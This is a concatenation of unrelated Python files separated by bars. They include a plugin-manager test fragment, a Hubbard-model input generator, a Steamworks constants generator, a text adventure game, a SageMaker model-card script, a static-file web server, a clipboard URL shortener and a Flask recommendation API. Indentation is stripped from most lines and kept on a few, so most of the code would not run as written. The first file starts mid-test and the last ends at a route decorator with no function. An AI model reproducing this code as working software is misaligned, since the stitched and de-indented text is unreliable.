with pytest.warns(UserWarning, match=r"'arg1', 'arg2'.*cannot be found.*$"):
pm.hook.hello.call_extra([], kwargs=dict())
with pytest.warns(UserWarning, match=r"'arg1', 'arg2'.*cannot be found.*$"):
pm.hook.herstory.call_historic(kwargs=dict())
def test_repr() -> None:
class Plugin:
@hookimpl
def myhook(self):
raise NotImplementedError()
pm = PluginManager(hookspec.project_name)
plugin = Plugin()
pname = pm.register(plugin)
assert repr(pm.hook.myhook.get_hookimpls()[0]) == (
f"<HookImpl plugin_name={pname!r}, plugin={plugin!r}>"
)
|
#!/usr/bin/env python
import sys
import numpy as np
from edrixs.iostream import write_emat, write_umat
def get_hopping_coulomb():
N_site = 16
norbs = 32
U, t = 4.0, -1.0
umat=np.zeros((norbs, norbs, norbs, norbs), dtype=np.complex128)
for i in range(N_site):
off = i*2
umat[off, off+1, off+1, off] = U
hopp=np.zeros((N_site, N_site), dtype=np.complex128)
indx=[
[3,1,12,4], [0,2,13,5], [1,3,14,6], [2,0,15,7],
[7,5,0,8], [4,6,1,9], [5,7,2,10], [6,4,3,11],
[11,9,4,12], [8,10,5,13], [9,11,6,14], [10,8,7,15],
        [15,13,8,0], [12,14,9,1], [13,15,10,2], [14,12,11,3]
]
for i, item in enumerate(indx):
hopp[i,item[0]] = hopp[i,item[1]] = hopp[i,item[2]] = hopp[i,item[3]] = t
hopping=np.zeros((norbs, norbs), dtype=np.complex128)
hopping[0:norbs:2, 0:norbs:2] = hopp
hopping[1:norbs:2, 1:norbs:2] = hopp
write_emat(hopping, "hopping_i.in", 1E-10)
write_umat(umat, "coulomb_i.in", 1E-10)
def get_config():
config_in=[
"&control",
"ed_solver = 1",
"num_val_orbs = 32",
"neval = 1",
"nvector = 1",
"maxiter = 500",
"eigval_tol = 1E-10",
"idump = .false.",
"&end"
]
    with open('config.in', 'w') as f:
        for line in config_in:
            f.write(line + "\n")
if __name__ == "__main__":
get_hopping_coulomb()
get_config()
|
import os
import sys
from SteamworksParser import steamworksparser
class InternalConstant:
def __init__(self, name, value, type_, precomments, comment, spacing):
self.name = name
self.value = value
self.type = type_
self.precomments = precomments
self.comment = comment
self.spacing = spacing
g_TypeDict = {
# Not a bug... But, it's a giant hack.
    # The issue is that most of these are used as the MarshalAs SizeConst in C# amongst other things and C# won't auto convert them.
"uint32": "int",
"unsigned int": "int",
"uint64": "ulong",
"size_t": "int",
}
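# e.g. a header constant declared as uint32 is emitted as a C# int
# ("public const int ..."), which compiles inside [MarshalAs(SizeConst=...)]
# attributes where C# expects an int constant.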
g_SkippedDefines = (
"VALVE_COMPILE_TIME_ASSERT(",
"REFERENCE(arg)",
"STEAM_CALLBACK_BEGIN(",
"STEAM_CALLBACK_MEMBER(",
"STEAM_CALLBACK_ARRAY(",
"END_CALLBACK_INTERNAL_BEGIN(",
"END_CALLBACK_INTERNAL_SWITCH(",
"END_CALLBACK_INTERNAL_END()",
"STEAM_CALLBACK_END(",
"INVALID_HTTPCOOKIE_HANDLE",
"BChatMemberStateChangeRemoved(",
"STEAM_COLOR_RED(",
"STEAM_COLOR_GREEN(",
"STEAM_COLOR_BLUE(",
"STEAM_COLOR_ALPHA(",
"INVALID_SCREENSHOT_HANDLE",
"_snprintf",
"S_API",
"STEAM_CALLBACK(",
"STEAM_CALLBACK_MANUAL(",
"STEAM_GAMESERVER_CALLBACK(",
"k_steamIDNil",
"k_steamIDOutofDateGS",
"k_steamIDLanModeGS",
"k_steamIDNotInitYetGS",
"k_steamIDNonSteamGS",
"BREAKPAD_INVALID_HANDLE",
"STEAM_PS3_PATH_MAX",
"STEAM_PS3_SERVICE_ID_MAX",
"STEAM_PS3_COMMUNICATION_ID_MAX",
"STEAM_PS3_COMMUNICATION_SIG_MAX",
"STEAM_PS3_LANGUAGE_MAX",
"STEAM_PS3_REGION_CODE_MAX",
"STEAM_PS3_CURRENT_PARAMS_VER",
"STEAMPS3_MALLOC_INUSE",
"STEAMPS3_MALLOC_SYSTEM",
"STEAMPS3_MALLOC_OK",
"S_CALLTYPE",
"POSIX",
"STEAM_PRIVATE_API(",
"STEAMNETWORKINGSOCKETS_INTERFACE",
# We just create multiple versions of this struct, Valve renamed them.
"ControllerAnalogActionData_t",
"ControllerDigitalActionData_t",
"ControllerMotionData_t",
#"INVALID_HTTPREQUEST_HANDLE",
)
g_SkippedConstants = (
# ISteamFriends
"k_FriendsGroupID_Invalid",
# ISteamHTMLSurface
"INVALID_HTMLBROWSER",
# ISteamInventory
"k_SteamItemInstanceIDInvalid",
"k_SteamInventoryResultInvalid",
"k_SteamInventoryUpdateHandleInvalid",
# ISteamMatchmaking
"HSERVERQUERY_INVALID",
# ISteamRemoteStorage
"k_UGCHandleInvalid",
"k_PublishedFileIdInvalid",
"k_PublishedFileUpdateHandleInvalid",
"k_UGCFileStreamHandleInvalid",
# ISteamUGC
"k_UGCQueryHandleInvalid",
"k_UGCUpdateHandleInvalid",
# SteamClientPublic
"k_HAuthTicketInvalid",
# SteamTypes
"k_JobIDNil",
"k_uBundleIdInvalid",
"k_uAppIdInvalid",
"k_uDepotIdInvalid",
"k_uAPICallInvalid",
"k_uManifestIdInvalid",
"k_ulSiteIdInvalid",
# steamnetworkingtypes.h
"k_HSteamNetConnection_Invalid",
"k_HSteamListenSocket_Invalid",
"k_HSteamNetPollGroup_Invalid",
"k_SteamDatagramPOPID_dev",
#TODO: Skip all these once we have typedef autogen hooked up.
#public const ulong k_GIDNil = 0xffffffffffffffffull;
#public const ulong k_TxnIDNil = k_GIDNil;
#public const ulong k_TxnIDUnknown = 0;
#public const int k_uPackageIdFreeSub = 0x0;
#public const int k_uPackageIdInvalid = 0xFFFFFFFF;
#public const ulong k_ulAssetClassIdInvalid = 0x0;
#public const int k_uPhysicalItemIdInvalid = 0x0;
#public const int k_uCellIDInvalid = 0xFFFFFFFF;
#public const int k_uPartnerIdInvalid = 0;
)
g_SkippedTypedefs = (
"uint8",
"int8",
"int32",
"uint32",
"int64",
"uint64",
)
g_CustomDefines = {
# "Name": ("Type", "Value"),
"MASTERSERVERUPDATERPORT_USEGAMESOCKETSHARE": ("ushort", "0xFFFF"),
"k_nMaxLobbyKeyLength": ("byte", None),
"STEAM_CONTROLLER_HANDLE_ALL_CONTROLLERS": ("ulong", "0xFFFFFFFFFFFFFFFF"),
"STEAM_CONTROLLER_MIN_ANALOG_ACTION_DATA": ("float", "-1.0f"),
"STEAM_CONTROLLER_MAX_ANALOG_ACTION_DATA": ("float", "1.0f"),
"STEAM_INPUT_HANDLE_ALL_CONTROLLERS": ("ulong", "0xFFFFFFFFFFFFFFFF"),
"STEAM_INPUT_MIN_ANALOG_ACTION_DATA": ("float", "-1.0f"),
"STEAM_INPUT_MAX_ANALOG_ACTION_DATA": ("float", "1.0f"),
}
def main(parser):
try:
os.makedirs("autogen/")
except OSError:
pass
lines = []
constants = parse(parser)
for constant in constants:
for precomment in constant.precomments:
lines.append("//" + precomment)
lines.append("public const " + constant.type + " " + constant.name + constant.spacing + "= " + constant.value + ";" + constant.comment)
with open("autogen/SteamConstants.cs", "wb") as out:
with open("templates/header.txt", "r") as f:
out.write(bytes(f.read(), "utf-8"))
out.write(bytes("namespace Steamworks {\n", "utf-8"))
out.write(bytes("\tpublic static class Constants {\n", "utf-8"))
for line in lines:
out.write(bytes("\t\t" + line + "\n", "utf-8"))
out.write(bytes("\t}\n", "utf-8"))
out.write(bytes("}\n\n", "utf-8"))
out.write(bytes("#endif // !DISABLESTEAMWORKS\n", "utf-8"))
def parse(parser):
interfaceversions, defines = parse_defines(parser)
constants = parse_constants(parser)
return interfaceversions + constants + defines
def parse_defines(parser):
out_defines = []
out_interfaceversions = []
for f in parser.files:
for d in f.defines:
if d.name in g_SkippedDefines:
continue
comment = ""
if d.c.linecomment:
comment = " //" + d.c.linecomment
definetype = "int"
definevalue = d.value
customdefine = g_CustomDefines.get(d.name, False)
if customdefine:
if customdefine[0]:
definetype = customdefine[0]
if customdefine[1]:
definevalue = customdefine[1]
elif d.value.startswith('"'):
definetype = "string"
if d.name.startswith("STEAM"):
out_interfaceversions.append(InternalConstant(d.name, definevalue, definetype, d.c.precomments, comment, " "))
continue
out_defines.append(InternalConstant(d.name, definevalue, definetype, d.c.precomments, comment, d.spacing))
return (out_interfaceversions, out_defines)
def parse_constants(parser):
out_constants = []
for f in parser.files:
for constant in f.constants:
if constant.name in g_SkippedConstants:
continue
comment = ""
if constant.c.linecomment:
comment = " //" + constant.c.linecomment
constanttype = constant.type
for t in parser.typedefs:
if t.name in g_SkippedTypedefs:
continue
if t.name == constant.type:
constanttype = t.type
break
constanttype = g_TypeDict.get(constanttype, constanttype)
constantvalue = constant.value
if constantvalue == "0xFFFFFFFF":
constantvalue = "-1"
elif constantvalue == "0xffffffffffffffffull":
constantvalue = constantvalue[:-3]
out_constants.append(InternalConstant(constant.name, constantvalue, constanttype, constant.c.precomments, comment, " "))
return out_constants
if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python {} <path to the Steamworks SDK headers>".format(sys.argv[0]))
        sys.exit(1)
steamworksparser.Settings.fake_gameserver_interfaces = True
main(steamworksparser.parse(sys.argv[1]))
|
x = int(input('Enter the number: \t'))
if x%2==0:
if x%3==0:
print("Number is divisible by 2 and 3")
else:
print("Number is divisible by 2 only")
print("x%3= ", x%3)
elif x%3==0:
print("Number is divisible by 3 only")
else:
print("Number is not divisible by 2 and 3")
print("x%2= ", x%2)
print("x%3= ", x%3)
print("Thank you")
|
import json, time, random
def main():
# TODO: allow them to choose from multiple JSON files?
with open('spooky_mansion.json') as fp:
game = json.load(fp)
print_instructions()
print("You are about to play '{}'! Good luck!".format(game['__metadata__']['title']))
print("")
play(game)
def play(rooms):
# Where are we? Look in __metadata__ for the room we should start in first.
current_place = rooms['__metadata__']['start']
# The things the player has collected.
stuff = ['Cell Phone; no signal or battery...']
start_time = time.time()
cat_fed = False
cat_loc = random.choice(list(rooms))
while True:
print("")
print("")
# Figure out what room we're in -- current_place is a name.
here = rooms[current_place]
# Print the description.
print(here["description"])
if len(here["items"]) > 0:
print("For the taking:")
for i in range(len(here["items"])):
print(" - ", here["items"][i])
# Is this a game-over?
if here.get("ends_game", False):
end_time = time.time()
break
if cat_fed == False:
if cat_loc == current_place:
if "Canned Tuna" in here["items"]:
print("You open the canned tuna and place it on the floor. The cat is overjoyed!")
here["items"].remove("Canned Tuna")
print("...")
print("The cat raises its head, revealing a large key around its collar. You got a mansion key!")
stuff.append("Mansion Key")
cat_fed = True
continue
if "Canned Tuna" in stuff:
print("A small black cat wanders into the room and starts puring at your feet. It must smell the fish!")
else:
print("A small black cat wanders around the room. It looks hungry.")
# Allow the user to choose an exit:
usable_exits,missing_key = find_usable_exits(here, stuff)
# Print out numbers for them to choose:
for i, exit in enumerate(usable_exits):
print(" {}. {}".format(i+1, exit['description']))
# See what they typed:
action = input("> ").lower().strip()
# If they type any variant of quit; exit the game.
if action in ["quit", "escape", "exit", "q"]:
print("You quit.")
break
if action == "help":
print_instructions()
continue
if action == "cat":
cat_loc = "basement"
continue
if action == "stuff":
print("You have:")
if len(stuff) == 0:
print(" - Nothing...")
else:
for i in range(len(stuff)):
print(" - ", stuff[i])
continue
if action == "take":
print("You took: ")
for i in range(len(here["items"])):
print(" - ", here["items"][i])
stuff.append(here["items"][i])
here["items"].clear()
continue
if action == "drop":
print("What will you drop?")
for i in range(len(stuff)):
print(" {}. {}".format(i+1, stuff[i]))
            dropselect = input("> ").lower().strip()
            try:
                itemdrop = int(dropselect) - 1
                here["items"].append(stuff.pop(itemdrop))
            except (ValueError, IndexError):
                print("I don't understand '{}'...".format(dropselect))
            continue
if action == "search":
found_hidden = False
for exit in here["exits"]:
hidden = exit.get("hidden")
if hidden == True:
exit['hidden'] = False
print("Your search is fruitful!")
found_hidden = True
if found_hidden == False:
print("You search high and low to no avail...")
continue
# TODO: if they type "stuff", print any items they have (check the stuff list!)
# TODO: if they type "take", grab any items in the room.
# TODO: if they type "search", or "find", look through any exits in the room that might be hidden, and make them not hidden anymore!
# Try to turn their action into an exit, by number.
try:
num = int(action) - 1
selected = usable_exits[num]
if selected in missing_key:
print("This exit is locked. You must find the key.")
else:
current_place = selected['destination']
cat_loc = random.choice(list(rooms))
print("...")
        except (ValueError, IndexError):
            print("I don't understand '{}'...".format(action))
print("")
print("You finished in", int(end_time - start_time), "seconds.")
print("")
print("=== GAME OVER ===")
def find_usable_exits(room, stuff):
"""
Given a room, and the player's stuff, find a list of exits that they can use right now.
That means the exits must not be hidden, and if they require a key, the player has it.
RETURNS
- a list of exits that are visible (not hidden) and don't require a key!
"""
usable = []
missing_key = []
for exit in room['exits']:
if exit.get("hidden", False):
continue
if "required_key" in exit:
if exit["required_key"] in stuff:
usable.append(exit)
continue
else:
missing_key.append(exit)
usable.append(exit)
continue
usable.append(exit)
return usable, missing_key
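# Example (shape inferred from the lookups above): an exit is a dict like
#     {"description": "A locked oak door.", "destination": "library",
#      "required_key": "Mansion Key", "hidden": False}
# find_usable_exits returns it in `usable`, and also in `missing_key` when
# "Mansion Key" is not in the player's stuff.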
def print_instructions():
print("=== Instructions ===")
print(" - Type a number to select an exit.")
print(" - Type 'stuff' to see what you're carrying.")
print(" - Type 'take' to pick up an item.")
print(" - Type 'quit' to exit the game.")
print(" - Type 'search' to take a deeper look at a room.")
print(" - Type 'help' to view instructions again.")
print("=== Instructions ===")
print("")
if __name__ == '__main__':
main()
|
"""Proof-of-concept for model card integration in SageMaker Pipelines"""
import logging
import tempfile
import urllib
from pathlib import Path
from datetime import datetime
import dataclasses
from typing import List, Text, Union, Optional
import json
import base64
import boto3
import jinja2
# lots of model card tutorial stuff gets skipped here because we add
# custom names to the model card schema, while, e.g. `mtc.export_format`
# method has the top-level names hardcoded into the method definition
import model_card_toolkit
logging.getLogger().setLevel(logging.INFO)
BASE_DIR = Path("/opt/ml/processing").resolve()
EVAL_REPORT_DIR = BASE_DIR/"evaluation"
EVAL_IMAGES_DIR = BASE_DIR/"eval_images"
JINJA_TEMPLATE_URI = ("https://raw.githubusercontent.com/"
"solita/mlops-pipeline-sagemaker/"
"main/templates/model_card.html.jinja")
OUTPUT_DIR = BASE_DIR/"model_card"
# TODO: if putting this into its own step, we'll need to find the
# current execution ARN (pipelines have concurrency so checking on status
# won't cut it). The only way I can see so far is to inject a fingerprint
# into, e.g. evaluation report and then match on fingerprints of all running
# pipelines. This should introduce a couple of extra S3 calls but that's
# alright as time is negligible in the overall pipeline exec time.
# ... for now, take the oldest running pipeline
@dataclasses.dataclass
class OperationalSetting:
"""Operational setting of the pipeline.
Attributes:
type: A short name / description of the pipeline setting
value: Value used in the pipeline execution
"""
type: Text
value: Union[int, float, Text]
confidence_interval: Optional[model_card_toolkit.ConfidenceInterval] = None
threshold: Optional[float] = None
slice: Optional[Text] = None
@dataclasses.dataclass
class PipelineSettings:
"""Parameters of pipeline's execution run.
Attributes:
pipeline_parameters: List of pipeline parameter values.
"""
pipeline_parameters: List[OperationalSetting] = dataclasses.field(
default_factory=list)
def _fetch_def_parval(parsed_json, parname):
matches = [p['DefaultValue'] for p in parsed_json['Parameters']
if p['Name'] == parname]
return matches[0] if matches else None
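# Example: given a definition containing
#     {"Parameters": [{"Name": "TrainTestSplit", "DefaultValue": 0.8}]}
# _fetch_def_parval(parsed_json, "TrainTestSplit") returns 0.8; parameter
# names that are absent return None.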
@dataclasses.dataclass
class PipelineModelCard(model_card_toolkit.ModelCard):
"""
pipeline_settings: Operational settings for the pipeline run.
"""
__doc__ += model_card_toolkit.ModelCard.__doc__
pipeline_settings: PipelineSettings = dataclasses.field(
default_factory=PipelineSettings)
pipeline_name = "BittiPipeline"
sensitive_data = False
region_name = "eu-central-1"
session = boto3.session.Session()
client_sagemaker = session.client(
service_name='sagemaker',
region_name=region_name
)
pipe_executions = client_sagemaker.list_pipeline_executions(
PipelineName=pipeline_name)
current_date = datetime.now(tz=datetime.now().astimezone().tzinfo)
last_exec, last_start_time, last_exec_arn = None, current_date, None
for exec_dict in pipe_executions['PipelineExecutionSummaries']:
if (exec_dict['PipelineExecutionStatus'] == 'Executing'
and exec_dict['StartTime'] < last_start_time):
last_exec_arn = exec_dict['PipelineExecutionArn']
last_start_time = exec_dict['StartTime']
last_exec = exec_dict['PipelineExecutionDisplayName']
last_description = exec_dict['PipelineExecutionDescription']
if not last_exec:
raise RuntimeError("Can't figure out which pipeline execution this"
" pipeline step is running in!")
logging.info("Selected pipeline run: %s", last_exec)
logging.info("Selected pipeline arn: %s", last_exec_arn)
logging.info("Selected pipeline ran: %s", last_start_time)
pipe_details = client_sagemaker.describe_pipeline_definition_for_execution(
PipelineExecutionArn=last_exec_arn)
pipe_definition = json.loads(pipe_details["PipelineDefinition"])
step_dict = {p['Name']: p for p in pipe_definition['Steps']}
logging.info("Pipeline definition: %s", pipe_details["PipelineDefinition"])
train_test_split = _fetch_def_parval(pipe_definition, 'TrainTestSplit')
s3_input_data = _fetch_def_parval(pipe_definition, 'InputData')
training_batch_size = _fetch_def_parval(pipe_definition, 'TrainingBatchSize')
training_instance_type = _fetch_def_parval(pipe_definition,
'TrainingInstanceType')
max_iterations = _fetch_def_parval(pipe_definition, 'MaxIterations')
model_approval_map_cut = _fetch_def_parval(pipe_definition,
'ModelApprovalmAPThreshold')
with open(EVAL_REPORT_DIR/"evaluation.json", "r") as fin:
eval_data = json.load(fin)
mAP = model_card_toolkit.PerformanceMetric(
type='Mean average precision (mAP) score',
value=f"{eval_data['regression_metrics']['mAP']['value']*100:.2f}%")
# TODO: some of the values below can be obtained from .mlmodel file
# metadata. But for that I'll need to include coremltools alongside
# the model-card-toolkit - still have to check for compatible versions.
# TODO: the rest of the - very voluminous! - descriptions should be migrated
# into the .ini file and used as pipeline parameters perhaps?
model_card = PipelineModelCard()
model_card.model_details.name = pipeline_name
model_card.model_details.overview = (
"This is an explainability report supplementing a magazine logo"
" detector neural network model. This model card is generated"
" automatically as part of the AWS SageMaker Pipelines execution run"
f" (version '{last_exec}') that trained the accompanying model"
" version. The pipeline took the input training images and"
" annotations (available for Solita's internal use at"
f" {s3_input_data}), augmented each image/label pair with a hundred"
" random rotation and projection transformation, and fed the resulting"
" data, split into training and evaluation set, into the training"
" script. The training, executed as a SageMaker Training Job with a"
f" custom Turi Create ECR image, achieved a mAP score of {mAP.value} on"
" BITTI magazine labels. After cross-checking with the mAP cutoff of"
f" {model_approval_map_cut*100:.2f}%, the model card generator step of"
" the pipeline created this HTML file and deployed it as a"
" publicly available static webpage.")
model_card.model_details.owners = [
model_card_toolkit.Owner("Solita Oy", "AIGA WP3 working group"),
model_card_toolkit.Owner("Vlas Sokolov", "vlas.sokolov@solita.fi")]
model_card.model_details.version.name = last_exec
model_card.model_details.version.date = str(last_start_time)
model_card.model_details.version.diff = last_description
model_card.model_details.license = "MIT License"
s3_train_data = step_dict['BittiDataProcessing']['Arguments'][
'ProcessingOutputConfig']['Outputs'][0]['S3Output']['S3Uri']
mct_data = model_card.model_parameters.data
mct_data.train.link = s3_train_data
mct_data.train.sensitive = sensitive_data
mct_data.train.name = (
f"Bitti training data ({train_test_split*100:.1f}% split)")
s3_test_data = step_dict['BittiDataProcessing']['Arguments'][
'ProcessingOutputConfig']['Outputs'][1]['S3Output']['S3Uri']
mct_data.eval.link = s3_test_data
mct_data.eval.sensitive = sensitive_data
mct_data.eval.name = (
f"Bitti evaluation data ({(1-train_test_split)*100:.1f}% split)")
# add evaluation example graphics
mct_data.eval.graphics.description = (
"The images below show the model performance on the evaluation set."
" The randomly chosen images and overlaid with model predictions.")
mct_data.eval.graphics.collection = []
for i, img_path in enumerate(EVAL_IMAGES_DIR.glob("*")):
with open(img_path, "rb") as image_file:
img_str_base64 = base64.b64encode(image_file.read())
graphic = model_card_toolkit.Graphic(name=f"Evaluation image #{i+1}",
image=img_str_base64.decode())
mct_data.eval.graphics.collection.append(graphic)
mct_data.input = model_card_toolkit.Dataset(
name="input", link=s3_input_data, sensitive=sensitive_data)
mct_data.augmented = model_card_toolkit.Dataset(
name="augmented", sensitive=sensitive_data,
link=step_dict['DataAugmentation']['Arguments'][
'ProcessingOutputConfig']['Outputs'][0]['S3Output']['S3Uri'])
turicreate_object_detection_uri = (
"https://github.com/apple/turicreate/blob/"
"master/userguide/object_detection/how-it-works.md")
# the model arch section has a {{ value | safe }} in the template
model_card.model_parameters.model_architecture = (
"TinyYOLO re-implemneted in turicreate. Extensive writeup"
" about the turicreate implementation can be found"
f" here: <a href=\"{turicreate_object_detection_uri}\">"
"How TuriCreate object detection works.</a>")
model_card.quantitative_analysis.performance_metrics.append(mAP)
model_card.pipeline_settings = PipelineSettings()
model_card.pipeline_settings.pipeline_parameters.extend([
OperationalSetting(
type='Fraction of data reserved for training',
value=train_test_split),
OperationalSetting(
type='Training: maximum number of iterations',
value=max_iterations),
OperationalSetting(
type='Training: batch size',
value=training_batch_size),
OperationalSetting(
type='Training: instance type',
value=training_instance_type),
# model_card_toolkit.PerformanceMetric(
OperationalSetting(
type='Model approval mAP threshold',
value=model_approval_map_cut),
])
model_card.considerations.users.append(
"Potential MLOps users looking for a CI/CD template for model deployment."
)
model_card.considerations.users.append(
"iOS developers interested in integrating pipeline-resultant"
" models into iPhone applications."
)
model_card.considerations.users.append(
"iPhone application users who seek to get insights into how the"
" neural network model was created."
)
model_card.considerations.users.append(
"AI explainability enthusiasts and researchers interested in"
" an xAI reference pipeline."
)
model_card.considerations.use_cases.append(
"The provided model is intended to be used as a part of a BITTI"
" magazine logo recognition application."
)
model_card.considerations.use_cases.append(
"It was developed for demo purposes, and was not intended to achieve"
" performance comparable to with state of the art computer vision"
" and deep learning applications."
)
model_card.considerations.limitations.append(
"The model was trained to recognize logos that roughly align with the"
" camera (in about +/- 15 degrees range), tilting the logos beyond"
" that range will likely result in degraded performance."
)
model_card.considerations.limitations.append(
"The model was trained to recognize logos with minimal projection"
" distortion. Using it on an image that was, for example, taken from"
" the side, will often not give desirable results."
)
model_card.considerations.limitations.append(
"Far away, blurry, obscured, over- or under-exposed magazine logo"
" images affect model performance negatively."
)
model_card.considerations.tradeoffs.append(
"The architecture chosen for the model was designed to process"
" smartphone camera videos in real-time. As only a limited processing"
" power is expected to be available, the trained model is relatively"
" lightweight. This, in turn, means that the model is not capable of"
" competing with state-of-the-art object detection architectures"
" of larger size."
)
model_card.considerations.tradeoffs.append(
"While other magazine labels can be learned from the same training set,"
" the developers chose not to label them in the training dataset due"
" to time constraints."
)
model_card.considerations.ethical_considerations = [
model_card_toolkit.Risk(
name=(
"As the magazine images are in public domain, there are few"
" ethical considerations the model developers can think of."
" However, potential model users or applications that take, e.g.,"
" magazine rack images in a store should be wary of accidentally"
" recording or leaking sensitive data such as people imagery or"
" store pricing/stock information."),
mitigation_strategy=(
"As the model is fully capable to run on an edge device such as a"
" mobile phone, a mitigation strategy for the issue above is to"
" limit the data storage to that of a local device."))]
# fetch the jinja template and generate the model card
mc_json = json.loads(model_card.to_json())
with tempfile.NamedTemporaryFile() as tmp:
urllib.request.urlretrieve(JINJA_TEMPLATE_URI, tmp.name)
temp_path = Path(tmp.name).resolve()
jinja_env = jinja2.Environment(
loader=jinja2.FileSystemLoader(temp_path.parent),
autoescape=True, auto_reload=True, cache_size=0)
template = jinja_env.get_template(temp_path.name)
model_card_html = template.render(
model_details=mc_json['model_details'],
model_parameters=mc_json.get('model_parameters', {}),
quantitative_analysis=mc_json.get('quantitative_analysis', {}),
pipeline_settings=mc_json.get('pipeline_settings', {}),
considerations=mc_json.get('considerations', {}))
logging.info("Created a model card HTML, saving to %s", OUTPUT_DIR)
with open(OUTPUT_DIR/"model_card.html", "w") as fout_html:
fout_html.write(model_card_html)
with open(OUTPUT_DIR/"model_card.json", "w") as fout_json:
json.dump(mc_json, fout_json)
|
from drawable_element import DrawableElement
from education_item import EducationItem
class Education(DrawableElement):
# constants
BASE_Y_OFFSET = 3090
MAX_WIDTH = 1660
MIN_X_SPACING = 35
CONTENT_Y_SPACING = 70
def __init__(self, data, cv):
super().__init__(cv)
self.edu_header = data["edu_header"]
self.items = data["items"][:2]
def draw(self):
if not self.items: return
header_coords = (self.cv.MARGIN + self.cv.HEADER_INDENT, self.BASE_Y_OFFSET)
self.cv.im_draw.text(header_coords, self.edu_header, self.cv.WHITE_3CH, font=self.cv.h_font)
header_size = self.cv.im_draw.textsize(self.edu_header, font=self.cv.h_font)
edu1_coords = (self.cv.MARGIN, self.BASE_Y_OFFSET + header_size[1] + self.CONTENT_Y_SPACING)
edu1 = EducationItem(self.items[0], self.cv)
edu1.draw()
self.cv.im.paste(edu1.im, edu1_coords)
if len(self.items) < 2: return
edu2 = EducationItem(self.items[1], self.cv)
edu2.draw()
x_margin = max((self.MAX_WIDTH - edu1.im.size[0] - edu2.im.size[0]) // 2, self.MIN_X_SPACING)
self.cv.im.paste(edu2.im, (edu1_coords[0] + edu1.im.size[0] + x_margin, edu1_coords[1]))
|
import bottle
from os import path
STATIC_FOLDER = path.join(path.dirname(__file__), 'public')
ALLOW_TYPES = ['html', 'js', 'css', 'png', 'jpg', 'ico', 'webp']
app = bottle.Bottle()
# single page app
@app.route('/')
@app.route('/index.html')
def index():
return bottle.static_file('index.html', root = STATIC_FOLDER)
# static files
@app.route(f'/<path:re:.*\\.({"|".join(ALLOW_TYPES)})>')
def static(path):
return bottle.static_file(path, root = STATIC_FOLDER)
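# e.g. '/app.js' or '/img/logo.webp' are served from ./public because their
# extensions appear in ALLOW_TYPES; '/api/data' falls through to a 404.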
if __name__ == "__main__":
app.run(host='127.0.0.1', port=8080)
|
import pygtk
pygtk.require('2.0')
import gtk
from pyshorteners.shorteners import Shortener
# get the clipboard
clipboard = gtk.clipboard_get()
#read clipboard for the text copied
url_original = clipboard.wait_for_text()
try:
    shortener = Shortener('TinyurlShortener')
    url = shortener.short(url_original)
    # set the clipboard data as shortened url
    clipboard.set_text(url)
except Exception:
    # fall back to the original text if shortening fails
    clipboard.set_text(url_original)
# Storing short url to clipboard
clipboard.store()
|
version https://git-lfs.github.com/spec/v1
oid sha256:5273b67e29f8efd017f0e9242282d3ec90d2b8355f528e3a195ca5d8b5cfbbbd
size 3303
|
# Celery task status
STATUS_PENDING = "PENDING"
STATUS_RUNNING = "RUNNING"
STATUS_SUCCESS = "SUCCESS"
STATUS_FAILURE = "FAILURE"
# Keys lookup status strings.
KEYS_STATUS_SUCCESS = "success"
KEYS_STATUS_FAIL = "fail"
KEYS_STATUS_NOMATCH = "nomatch"
|
# AUTOGENERATED! DO NOT EDIT! File to edit: nbs/010_UK.ipynb (unless otherwise specified).
__all__ = ['LAST_MODIFIED']
# Cell
from ..imports import *
from ..core import *
import openpyxl
# Cell
LAST_MODIFIED = datetime.date.today()
|
import requests
import json
from flask import Blueprint, request, jsonify, render_template, Flask
from flask_cors import CORS, cross_origin
import pandas as pd
import re
import os
# *************************************************************************** #
# ML Engineers imports. Must be formated like this or else pickled model won't
# work
from sklearn.feature_extraction import text
# TFIDF / Word Embeddings
from sklearn.feature_extraction.text import TfidfVectorizer
# Similarity
from sklearn.neighbors import NearestNeighbors
# Deployment
import pickle
# *************************************************************************** #
# Activating CORS
app = Flask(__name__)
app.config['CORS_HEADERS'] = 'Content-Type'
cors = CORS(app)
# *************************************************************************** #
from_back_routes = Blueprint("from_back_routes", __name__)
DF_FEATURES = ['Strain', 'Type', 'Effects', "Flavor", 'Description']
def clean_payload(pay_load):
'''
Quick helper function for cleaning the payload
'''
input_strain = pd.DataFrame.from_records(pay_load, index=[0], columns=[
'UserID', 'Strain', 'Type', 'Effects', 'Flavor', 'Description'])
for each in DF_FEATURES:
input_strain[each] = input_strain[each].apply(lambda x: x.lower())
input_strain[each] = input_strain[each].apply(
lambda x: re.sub('[^a-zA-Z 0-9]', ' ', x))
# Combines text
input_strain['combined_text'] = input_strain['Type'] + ' ' + input_strain['Effects'] + \
' ' + input_strain['Flavor'] + input_strain['Description'] + ' '
return input_strain
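# Example payload shape (hypothetical values; field names come from
# DF_FEATURES plus 'UserID'):
#     {"UserID": 7, "Strain": "blue-dream", "Type": "hybrid",
#      "Effects": "happy,relaxed", "Flavor": "berry",
#      "Description": "a sativa-dominant hybrid"}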
def safe_paths():
'''
    Quick helper to build platform-independent file paths
    Returns - (model_path, df_path, vect_path)
'''
model_path = os.path.join('models',
'pickled_model.pkl')
df_path = os.path.join('models',
'pickled_df.pkl')
vect_path = os.path.join('models',
'pickled_vect.pkl')
return (model_path, df_path, vect_path)
def load_models():
'''
Helper function for loading pickled models
'''
model_path, df_path, vect_path = safe_paths()
# load the model from disk
pickled_model = pickle.load(open(model_path, 'rb'))
strain_list = pd.read_pickle(df_path)
pickled_vect = pickle.load(open(vect_path, 'rb'))
return (pickled_model, strain_list, pickled_vect)
# *************************************************************************** #
# Loading the pickled models in global memory, to increase response time of api
PICKLED_MODEL, STRAIN_LIST, PICKLED_VECT = load_models()
# *************************************************************************** #
def find_rec_strains(p_strain):
"""
This function takes in a preprocessed JSON from preprocess_strain(strain).
It creates a JSON containing info on the 5 most similar strains
"""
# Transforms preprocessed strain
trans_strain = PICKLED_VECT.transform(
p_strain['combined_text'])
trans_strain = trans_strain.todense()
# Predit KNN for strain strains
pred_strains = PICKLED_MODEL.kneighbors(trans_strain)
# Grab top 5 results that are most similar to user inputted strain
recs = []
for each in pred_strains[1][0]:
temp = STRAIN_LIST.iloc[each]
recs.append(temp)
recs = pd.DataFrame(recs).iloc[0].to_json()
    print('Created recommendation JSON')
return recs
def clean_response(recs, userID):
features = DF_FEATURES.copy()
features.insert(0, 'UserID')
temp = json.loads(recs)
temp['UserID'] = userID
cleaned = {}
for f in features:
cleaned[f] = temp[f]
return cleaned
@from_back_routes.route('/send', methods = ["POST"])
@cross_origin()
